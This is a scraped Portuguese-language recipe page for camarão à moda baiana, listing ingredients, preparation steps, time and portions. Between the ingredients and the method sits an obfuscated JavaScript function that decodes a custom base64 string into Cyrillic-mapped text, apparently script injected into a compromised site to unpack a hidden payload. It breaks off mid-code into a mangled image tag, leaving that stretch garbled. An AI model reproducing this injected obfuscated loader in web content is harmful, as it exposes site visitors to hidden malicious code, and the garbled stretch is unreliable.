Camarão à Moda Baiana

Ingredientes

1 kg de camarões
sal, pimenta limão, cheiro verde ao seu gosto
1 kg de tomates (sem pele e sem sementes)
2 colheres de sopa de óleo de soja
2 ou 3 colheres de sopa de azeite de dendê
leite de coco

function a4872b9c6b(y1){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var x0=”;var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaando o Camarão” src=”http://pampo.com.br/site/wp-content/uploads/2011/02/11479_gg-300×225.jpg” alt=”” width=”300″ height=”225″ />Modo de Preparo

1- Limpe os camarões, retirando as cascas e as tripas, e lavando-os a seguir
2- Tempere com sal, pimenta, suco de limão e cheiros-verdes
3- Leve ao fogo uma panela com um pouco de óleo
4- Quando o o óleo estiver quente, coloque os camarões e deixe dourar bem, junte os tomates formando um molho bem consistente
5- Acrescente o leite de coco, e deixe no fogo com panela bem tapada, por mais 10 minutos
6- Por fim, junte o azeite de dendê
7- Pimenta a gosto

Tempo de preparo: 1h 00min

Porções: 4 porções


Notícias Relacionadas: